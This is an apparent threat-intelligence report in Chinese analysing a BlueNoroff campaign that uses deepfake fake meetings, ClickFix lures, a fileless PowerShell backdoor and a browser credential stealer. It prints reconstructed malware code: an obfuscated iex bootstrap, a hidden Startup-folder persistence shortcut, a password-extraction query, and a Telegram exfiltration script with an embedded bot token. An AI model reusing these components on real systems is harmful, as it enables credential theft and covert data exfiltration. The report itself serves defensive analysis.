摘要
研究報告深入探討由 Threat actor BlueNoroff 發動的精密入侵活動。該活動結合進階社交工程、AI 生成深偽媒體與多階段無檔案惡意程式,目標鎖定 Web3 與加密貨幣領域。透過分析點對點的攻擊週期,報告解析了「ClickFix」執行機制、利用 PowerShell 的 C2 後門架構,以及專門用來竊取瀏覽器認證資料的擷取管道。這些發現凸顯了該 actor 在建構逼真會議環境與繞過現代瀏覽器安全機制(如 App-Bound Encryption)方面的顯著進化 [1] 。
1. 社交工程與 AI 增強的誘餌建構
此活動(campaign)的初始入侵階段仰賴精心設計的社交工程流程。Threat actor 假冒法律與金融領域的知名人士,透過 Calendly 發起接觸。此流程最終導向一個在誤植域名(typo-squatted domains)上代管的「假會議」,視覺上模仿 Zoom、Microsoft Teams 等合法視訊會議平台 [1] 。
這項活動中的一項關鍵革新,是使用了自我強化的媒體生成流程。該 actor 運用三種不同類型的假冒參與者內容,來提升會議的可信度:
- 偷錄影片: 從先前受害者竊取而來的真實網路攝影機記錄,被重新用於冒充已知的相關人員。
- AI 生成頭像: 使用先進 LLM 圖像模型產生的高解析度頭像,作為靜態占位圖。
- Deepfake 合成影像: 最進階的技術,將 AI 生成的臉部對應到身體與動作來源,創造動態的「talking-head」影片 [1] 。
在會議過程中,誘餌頁面會透過
getUserMedia
API 擷取受害者的即時攝影機畫面,這些畫面隨後會被外傳到攻擊者的基礎設施,用於未來行動。這形成了一個遞迴的假冒與認證竊取循環
[1]
。
2. ClickFix 執行機制
從社交工程到技術入侵的過渡,是由「ClickFix」手法促成的。當受害者嘗試加入假會議時,介面會模擬一個技術錯誤(例如「找不到音訊/視訊驅動程式」)。接著,受害者會收到提示,要求透過彈出視窗中提供的指令來「修正」問題。這個指令實際上是一個惡意腳本,受害者會在社交工程手法下被誘導複製並貼到終端機中執行 [2] 。
下圖說明了從初次點擊到部署 C2 後門的執行流程:
graph TD
A[Victim Clicks
Typo-squatted Zoom Link] --> B[Fake Meeting Interface
Loads] B --> C[Simulated
Technical Error Popup] C --> D[Victim Copies
'Fix' Command] D --> E[Victim Executes Command
in PowerShell] E --> F[Stage A:
Fileless PowerShell C2
Implant] F --> G[System Fingerprinting
& Persistence] G --> H[Stage B:
Browser Credential Stealer]
Typo-squatted Zoom Link] --> B[Fake Meeting Interface
Loads] B --> C[Simulated
Technical Error Popup] C --> D[Victim Copies
'Fix' Command] D --> E[Victim Executes Command
in PowerShell] E --> F[Stage A:
Fileless PowerShell C2
Implant] F --> G[System Fingerprinting
& Persistence] G --> H[Stage B:
Browser Credential Stealer]
3. 多階段惡意程式架構
3.1 階段 A:無檔案 PowerShell C2 後門
階段 A 的後門是一個無檔案 PowerShell 腳本,設計用於執行持續性、擷取系統特徵以及 Payload 交付。它的運作方式是將加密後的 Payload 直接下載到記憶體中,將於受害者磁碟上留下的痕跡降到最低。該腳本使用 Base64 編碼與 XOR 混淆的啟動機制,在系統重新開機後重新與 C2 伺服器建立通訊 [1] 。
- # Reconstructed Bootstrap Logic for Stage A Persistence
- $sta = "%USERPROFILE%\chrome-debug-data001.log"
- # Read the encoded payload from the log file
- $encodedContent = Get-Content $sta
- # Decode using Base64 and XOR with 0x43
- $decodedScript = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encodedContent) | ForEach-Object { $_ -bxor 0x43 })
- # Execute the decoded script in memory
- powershell.exe -ep Bypass -c "$decodedScript | iex"
3.2 階段 B:進階瀏覽器 Credential 擷取
階段 B 的 Payload 是一個以 MSVC 編譯的精密 PE 執行檔,專門用於竊取 Chromium 系瀏覽器(Chrome、Edge、Brave)中的 Credential。此竊取程式的顯著功能是能夠繞過 Chrome 最新版本中導入的「App-Bound Encryption」機制 [1] 。
擷取流程分為三個階段:
-
Master Key 復原:
竊取程式會實體化瀏覽器的 COM 提升服務(
IElevator介面),以解密位於Local StateJSON 檔案中的app_bound_encrypted_key。 - 資料庫解密: 復原後的 32 位元組 Master Key 被用來透過 Windows BCrypt API 以及 AES-256-GCM 演算法,解密儲存在瀏覽器 SQLite 資料庫中的 Credential 資料塊。
-
資料篩選:
竊取程式查詢
Login Data資料庫,並提取origin_url、username_value與password_value,尤其專注於加密貨幣錢包擴充功能 [1] 。
- // Pseudo-code for Stage B SQL Query Preparation</span>
- // The stealer opens the SQLite database with SQLITE_OPEN_READONLY | SQLITE_OPEN_NOMUTEX
- const char* query = "SELECT origin_url, username_value, password_value FROM logins;";
- sqlite3_prepare_v2(db, query, -1, &stmt, NULL);
- while (sqlite3_step(stmt) == SQLITE_ROW) {
- const char* url = (const char*)sqlite3_column_text(stmt, 0);
- const char* user = (const char*)sqlite3_column_text(stmt, 1);
- // The password blob is decrypted using the recovered AES-GCM key
- decrypt_blob(sqlite3_column_blob(stmt, 2), key);
- }
4. 持續性與權限提升
持續性是透過放在使用者「啟動」資料夾中的 Windows 捷徑 (.LNK) 檔案來維持。該 LNK 檔案偽裝成「Chrome Update」,並以最小化視窗執行 PowerShell bootstrap payload,以避免偵測。此外,該 actor 利用 COM 提升 Moniker(
Elevation:Administrator!new
)的 UAC 繞過技術,在不觸發使用者提示的情況下取得管理員權限
[1]
。
- # Persistence LNK Creation Logic
- $WshShell = New-Object -ComObject WScript.Shell
- $Shortcut = $WshShell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update - Certificated.lnk")
- $Shortcut.TargetPath = "powershell.exe"
- $Shortcut.Arguments = "-ep Bypass -WindowStyle Hidden -c \"Get-Content '$env:USERPROFILE\chrome-debug-data001.log' | iex\""
- $Shortcut.IconLocation = "C:\Program Files\Google\Chrome\Application\chrome.exe,0"
- $Shortcut.WindowStyle = 7 # Minimized
- $Shortcut.Save()
5. 資料外傳管道
該活動使用兩種主要方法來外傳資料。第一種方法是透過 HTTP POST 請求,將系統特徵與擷取的螢幕截圖傳送到專屬的外傳端點。第二種更具韌性的方法,是使用 Telegram Bot API 將螢幕截圖直接發送到攻擊者控制的聊天室。這種方法特別有效,因為它利用了合法的加密流量,使得基於網路層級的資安控管機制難以將其與正常活動區分 [1] 。
- # Telegram Screenshot Exfiltration Logic</span>
- $botToken = "8446140951:AAExeAepUZQAegP0A9IQbp__JB4xDaq4ohc"
- $chatId = "7016628218"
- $url = "https://api.telegram.org/bot$botToken/sendPhoto"
- <span class="code-comment"># Capture screen and send as multipart/form-data</span>
- $screenshot = Capture-Screen
- Invoke-RestMethod -Uri $url -Method Post -Form @{
- chat_id = $chatId
- photo = $screenshot
- caption = "$env:USERNAME | $env:COMPUTERNAME | $(Get-Date)"
- }
6. 結論
BlueNoroff 最新活動所展現的技術成熟度,顯示出高度的營運成熟性。透過將 AI 生成的 Deepfake 整合到社交工程流程,並運用進階技術繞過瀏覽器安全性,該 actor 顯著提升了入侵的成功率。Web3 領域的組織必須採取多層次的防禦策略,包括強健的端點偵測、網路流量分析,以及全面的資安意識培訓,以降低此類進階持續性威脅所帶來的風險 [3] 。